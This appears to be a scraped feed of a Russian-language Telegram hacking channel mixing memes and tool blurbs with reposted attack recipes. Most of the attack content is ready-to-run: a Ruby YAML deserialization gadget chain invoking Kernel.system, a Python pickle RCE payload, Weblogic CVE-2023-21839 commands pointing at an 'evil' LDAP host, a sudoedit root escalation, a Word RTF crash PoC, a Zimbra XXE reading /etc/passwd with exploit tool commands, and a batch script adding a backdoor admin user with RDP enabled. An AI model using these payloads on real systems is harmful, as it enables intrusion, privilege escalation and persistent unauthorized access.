Похек
16.4K subscribers
2.08K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Monkey Hacker
Ruby Deserialization via YAML file

# RU

Тут не будет каких-то подробностей, считайте дополнение к прошлому посту

Сама команда выполняется в git_set
Т. е сам YAML файл выглядит так

# EN

There won't be any details, just consider it an addition to the previous post

The command itself is executed in git_set
That is, the YAML file itself looks like this


---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve


# RU

А содержимое ruby скрипта будет таким

# EN

And the contents of the ruby script will be

require "yaml"
YAML.load(File.read("payload.yml"))


# RU

И потом делаем

# EN

And then do

ruby deser.rb

# RU

Да там будут ошибки, однако наша команда будет выполняться.

# EN

Yes, there will be mistakes, but our command will be executed.


THX:

https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565

https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/

https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
👍5
THM WriteUP | Mustacchio

На Codeby вышла очередная моя статья, в этот раз прохождение лабы на TryHackMe.

Всем привет! Недавно начал писать прохождения различных тачек на TryHackMe на английском языке, теперь буду писать и на русском. В этот раз я буду решать Mustacchio. У него теги: XXE, PrivEsc.
Если вам будет интересен глубокий разбор XXE - фидбекайте в комментах и сделаю его!
🔥7
Forwarded from Эксплойт
This media is not supported in your browser
VIEW IN TELEGRAM
Сбер выпустил необычное поздравление с Днем защитника Отечества — с помощью технологий дополненной реальности компания поблагодарила всех мужчин за их каждодневный труд и заботу.

Официально, самое красивое поздравление сегодня.

@exploitex
🔥10🤣2👍1
Top 15 - Vulnerability Scanners

#tools

thx @geeekgirls
🔥4
Fortinet FortiNAC Unauthenticated RCE

В четверг, 16 февраля 2023 года, компания Fortinet выпустила PSIRT, в котором подробно описана CVE-2022-39952, критическая уязвимость, затрагивающая ее продукт FortiNAC. Эта уязвимость, обнаруженная Gwendal Guégniaud из Fortinet, позволяет не аутентифицированному злоумышленнику записать произвольные файлы в системе и в результате получить RCE от root'а.

#fortinet #CVE #POC
— Научи или взломай для меня сервер майнкрафта, чтобы брат не играл сутки напролет в эту галиматью, у нас уже скандалы в семье.

— А можешь взломать ВК моего бывшего, я тебе пиво куплю?

— Взломай Ватсап моего парня, тебе же не сложно.

— Почини чайник, тыж программист!

#мем
👍9🤣5🔥1
Обращение к пентестерам/ресерчерам по мобилкам. Если такие есть здесь. Накидайте пожалуйста непопулярного полезного материала, может даже ваши советы или лайфхаки. Любым конструктивным советам буду рад!
Vulmap

Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.

Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.

#tools
Vulmap

Vulmap - это проект онлайн-сканера локальных уязвимостей с открытым исходным кодом. Он состоит из онлайн-программ локального сканирования уязвимостей для операционных систем Windows и Linux. Эти скрипты могут использоваться в оборонительных и наступательных целях. С помощью этих скриптов можно проводить оценку уязвимостей. Кроме того, они могут использоваться для повышения привилегий пентестерами/красными командами.

Vulmap можно использовать для сканирования уязвимостей на локальном хосте, просмотра соответствующих эксплойтов и их загрузки. В основном скрипты сканируют localhost для сбора информации об установленном ПО и запрашивают API vulmon.com о наличии уязвимостей и эксплойтов, связанных с установленным ПО. Если уязвимости существуют, Vulmap выдает CVE ID, оценку риска, подробную ссылку на уязвимость, если есть, идентификаторы соответствующих эксплойтов и названия эксплойтов. Эксплойты также можно загрузить с помощью Vulmap.

#tools
This media is not supported in your browser
VIEW IN TELEGRAM
SMBGhost (CVE-2020-0796) Automate Exploitation and Detection

Этот python-скрипт является оберткой от уязвимости RCE SMBGhost. Все заслуги за рабочий эксплойт - chompie1337. Все заслуги за сканер - ioncodes.
Я просто автоматизировал эти функции в одной программе. Вам нужно иметь в виду архитектуру Windows-мишени, когда вы собираетесь создать обратную оболочку.

Этот эксплойт не является стабильным, используйте его по своему усмотрению. Иногда он не срабатывает с первого раза, поэтому я добавил вторую попытку.

#tools
👍5
Forwarded from Monkey Hacker
Python Deserialization via Pickle

# RU

У Python есть несколько методов сериализации объектов: Marshall и Pickle
Модуль Pickle реализует двоичные протоколы для сериализации и десериализации объектов Python. Однако модуль Pickle не является безопасным и лучше распаковывать только те данные, которым вы доверяете.

Для эксплуатации мы будем использовать следующий метод:
pickle.dumps(obj)

Помимо этого есть еще библиотека pickletools

Этот модуль содержит различные методы, относящиеся к внутренним деталям модуля pickle

Здесь нам потребуются два метода:
pickletools.optimize()
pickletools.dis()

Теперь мы можем сделать свой пэйлоад для получения RCE. Кстати чтобы также сериализовался наш пэйлоад, то мы используем reduce в нашем классе


# EN


P
ython has several methods for serializing objects: Marshall and Pickle
The Pickle module implements binary protocols for serializing and deserializing Python objects. However, the Pickle module is not secure and will only decompress data that you trust.

We will use the following method to exploit it:
pickle.dumps(obj)

Apart from that there is also the pickletools library.

This module contains various methods related to the pickle module's internals

Here we need two methods:
pickletools.optimize()
pickletools.dis()

Now we can make our own payload to get the RCE. By the way, to serialize our payload as well, we use reduce in our class

PAYLOAD

import base64
import pickle
import pickletools
import subprocess
class anti_pickle_serum:
def reduce(self):
command = ['id']
return subprocess.check_output, (command,)
exploit_obj = anti_pickle_serum()
raw_pickle = pickle.dumps({"serum" : exploit_obj}, protocol=0)
optimized_pickle = pickletools.optimize(raw_pickle)
pickletools.dis(optimized_pickle)
payload = base64.b64encode(raw_pickle)
print(payload)


THX:

https://docs.python.org/3/library/pickle.html

https://davidhamann.de/2020/04/05/exploiting-python-pickle/

https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd
5
Weblogic CVE-2023-21839 RCE

Linux/Mac OS
 cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows
 cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
Автор улетит скоро! Когда вернусь, продолжу посты)
👍5🐳4🔥1🌭1
Forwarded from Monkey Hacker
Sudoedit Privilege Escalation (CVE-2023-22809)

#RU

Проверьте, что вы можете использовать sudoedit

cat /etc/sudoers

Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root

export EDITOR='vim -- /path/to/your/files'

Теперь вы можете читать/писать файлы с привилегиями root

sudoedit /etc/custom/service.conf

#EN

Check that you can use sudoedit

cat /etc/sudoers

By introducing an extra dash, we can make our editor work as root

export EDITOR='vim -- /path/to/your/files'

Now you can read/write files with root

sudoedit /etc/custom/service.conf

Tools:

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
This media is not supported in your browser
VIEW IN TELEGRAM
🎉8🐳1
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
🔥5
XXE to RCE Zimbra CVE-2019-9670

Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)

Payload XXE:
 xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Ниже приведу парочку примеров, как эксплуатировать эту вулну.
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit

Arambiz - эксплойт на Python3:
 clone https://github.com/oppsec/arbimz.git
pip3 install -r requirements.txt
python3 main.py --url https://example.com/

Zaber - эксплойт на Go:
 install github.com/oppsec/zaber@latest
zaber -u https://example.com
Если у вас не находит бинарь, то пропишите абсолютный путь.
 -u https://example.com
А после работ не забудьте добавить $HOME/go/bin/ в свой PATH 😉


Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.

Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
Forwarded from Monkey Hacker
Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a script to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0